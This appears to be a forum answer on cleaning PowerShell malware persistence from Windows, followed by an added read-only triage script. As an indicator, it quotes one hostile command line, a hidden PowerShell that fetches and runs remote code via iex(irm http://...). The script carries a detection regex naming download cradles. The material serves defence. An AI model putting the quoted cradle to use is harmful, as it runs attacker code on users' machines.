The behavior is consistent with a malicious script that uses PowerShell for persistence and to contact a remote server. The fix is to remove the persistence points that launch PowerShell and then verify that no malicious PowerShell processes are still running.
A practical cleanup approach (based on a similar resolved case) is:
- Check the Run registry key for malicious PowerShell entries
  - Open PowerShell as Administrator.
  - List startup entries under the current user:
    reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  - Look for any value whose data starts with PowerShell, for example:
    powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://...)"
  - If such an entry exists, delete it (replace the value name with the one found):
    reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows PowerShell v1.0" /f
- Find what is launching PowerShell
  - Still in elevated PowerShell, run:
    Get-CimInstance Win32_Process | Where-Object { $_.Name -like "powershell*" } | Select-Object Name,ProcessId,ParentProcessId,CommandLine
  - If the parent process is the Task Scheduler service (for example svchost.exe -k netsvcs -s Schedule), PowerShell is being started by a scheduled task.
- Remove malicious scheduled tasks
  - List all tasks and their actions:
    Get-ScheduledTask | ForEach-Object { foreach ($a in $_.Actions) { "{0}{1} | {2} {3}" -f $_.TaskPath,$_.TaskName,$a.Execute,$a.Arguments } }
  - Look for tasks that execute powershell.exe with suspicious arguments such as -ExecutionPolicy Bypass, -WindowStyle Hidden, or iex(irm http://...).
  - When a malicious task is identified (example name: Windows Perflog), remove it:
    Unregister-ScheduledTask -TaskName "Windows Perflog" -Confirm:$false
- Check for WMI-based persistence
  - Some malware uses WMI event subscriptions to relaunch PowerShell. Run:
    Get-WmiObject -Namespace root\subscription -Class __EventFilter
    Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer
    Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer
  - Review the output for entries that launch PowerShell or contain suspicious URLs or commands and remove them as appropriate.
- Check Startup folders
  - Inspect these folders for .ps1, .vbs, .bat, or unknown executables:
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
  - Delete any clearly malicious script or shortcut that launches PowerShell.
- Final verification
  - After cleanup, reboot.
  - Open PowerShell and verify that only the current PowerShell process is running:
    Get-CimInstance Win32_Process | Where-Object { $_.Name -like "powershell*" } | Select-Object Name,CommandLine
  - PowerShell should no longer open by itself at startup, and no background PowerShell processes with hidden windows or remote URLs should appear.
If PowerShell still launches automatically or new suspicious entries reappear, a full offline scan with Microsoft Defender or a clean reinstall of Windows should be considered to ensure complete removal.
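The steps above, collected into one read-only sweep. This is an added example and not part of the original answer: it assumes an elevated Windows PowerShell 5.1 prompt (Get-WmiObject is not available in PowerShell 7), it goes beyond the answer by also checking the HKLM Run/RunOnce keys, the WMI __FilterToConsumerBinding class and resolved .lnk shortcuts, and the indicator regex is an assumption modelled on the command line quoted in the answer. It only reports; removal stays manual, using the reg delete, Unregister-ScheduledTask and WMI steps given above.

```powershell
# Added example (not from the original answer): read-only triage of the
# persistence locations walked through above. Run from an elevated Windows
# PowerShell 5.1 prompt. Nothing is deleted; findings are printed for review.

# Assumption: indicators derived from the quoted "-ExecutionPolicy Bypass
# -WindowStyle Hidden -Command iex(irm http://...)" pattern, plus common
# abbreviations and download cradles. Tune for your environment.
$Suspicious = '(?i)-e(xecution)?p(olicy)?\s+bypass|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|\biex\b|\birm\b|\biwr\b|invoke-expression|invoke-restmethod|invoke-webrequest|downloadstring|https?://'

$script:Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding {
    param([string]$Source, [string]$Name, [string]$Detail, [switch]$Always)
    # Record an entry when it matches the indicator regex, or unconditionally for -Always
    if ($Always -or ($Detail -match $Suspicious)) {
        $script:Findings.Add([pscustomobject]@{ Source = $Source; Name = $Name; Detail = $Detail })
    }
}

# 1. Run / RunOnce keys: the answer checks HKCU only; malware with admin rights uses HKLM too
$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($Key in $RunKeys) {
    if (-not (Test-Path $Key)) { continue }
    foreach ($Prop in (Get-ItemProperty -Path $Key).PSObject.Properties) {
        if ($Prop.Name -in @('PSPath','PSParentPath','PSChildName','PSDrive','PSProvider')) { continue }
        Add-Finding -Source $Key -Name $Prop.Name -Detail ([string]$Prop.Value)
    }
}

# 2. Scheduled tasks: every action of every task in every folder
foreach ($Task in Get-ScheduledTask) {
    foreach ($Action in $Task.Actions) {
        Add-Finding -Source 'ScheduledTask' -Name "$($Task.TaskPath)$($Task.TaskName)" `
                    -Detail "$($Action.Execute) $($Action.Arguments)"
    }
}

# 3. WMI event subscriptions. Consumers and bindings are rare on a clean system,
#    so they are listed unconditionally; filters are matched against the regex.
$Ns = 'root\subscription'
foreach ($F in Get-WmiObject -Namespace $Ns -Class __EventFilter) {
    Add-Finding -Source 'WMI __EventFilter' -Name $F.Name -Detail $F.Query
}
foreach ($C in Get-WmiObject -Namespace $Ns -Class CommandLineEventConsumer) {
    Add-Finding -Source 'WMI CommandLineEventConsumer' -Name $C.Name -Detail "$($C.ExecutablePath) $($C.CommandLineTemplate)" -Always
}
foreach ($C in Get-WmiObject -Namespace $Ns -Class ActiveScriptEventConsumer) {
    Add-Finding -Source 'WMI ActiveScriptEventConsumer' -Name $C.Name -Detail "$($C.ScriptFileName) $($C.ScriptText)" -Always
}
foreach ($B in Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding) {
    Add-Finding -Source 'WMI __FilterToConsumerBinding' -Name $B.Filter -Detail $B.Consumer -Always
}

# 4. Startup folders (per-user and all-users), resolving .lnk targets so a shortcut
#    that points at powershell.exe is inspected like a script would be
$StartupDirs = @(
    (Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'),
    (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\Startup')
)
$Shell = New-Object -ComObject WScript.Shell
foreach ($Dir in $StartupDirs) {
    if (-not (Test-Path $Dir)) { continue }
    foreach ($File in Get-ChildItem -Path $Dir -File -Force) {
        $Detail = $File.FullName
        if ($File.Extension -eq '.lnk') {
            $Lnk = $Shell.CreateShortcut($File.FullName)
            $Detail = "$($Lnk.TargetPath) $($Lnk.Arguments)"
        }
        # Scripts and executables in a startup folder are always worth a look
        Add-Finding -Source 'StartupFolder' -Name $File.Name -Detail $Detail `
                    -Always:($File.Extension -in @('.ps1','.vbs','.bat','.cmd','.exe'))
    }
}

# 5. Running PowerShell processes other than this console, with the parent resolved
#    by name so a Task Scheduler (svchost.exe -k netsvcs -s Schedule) or
#    WmiPrvSE.exe parent is visible without a second lookup
$Procs = Get-CimInstance Win32_Process
$ByPid = @{}
foreach ($P in $Procs) { $ByPid[[int]$P.ProcessId] = $P }
foreach ($P in ($Procs | Where-Object { $_.Name -like 'powershell*' -or $_.Name -like 'pwsh*' })) {
    if ($P.ProcessId -eq $PID) { continue }
    $Parent = $ByPid[[int]$P.ParentProcessId]
    $ParentDesc = if ($Parent) { "$($Parent.Name) [$($Parent.CommandLine)]" } else { "<exited pid $($P.ParentProcessId)>" }
    Add-Finding -Source 'RunningProcess' -Name "PID $($P.ProcessId) parent=$ParentDesc" -Detail ([string]$P.CommandLine) -Always
}

if ($script:Findings.Count -eq 0) {
    'No suspicious persistence entries or stray PowerShell processes found.'
} else {
    $script:Findings | Format-Table -AutoSize -Wrap
}
```

Save it as a .ps1 and run it before cleanup to get the full list of persistence points, then again after the reboot as the final verification: on a clean machine the RunningProcess section should be empty and the WMI consumer sections should show nothing beyond whatever your own management tooling registers. A task or Run value that appears here is removed with the commands in the steps above, after confirming it is not something you installed yourself.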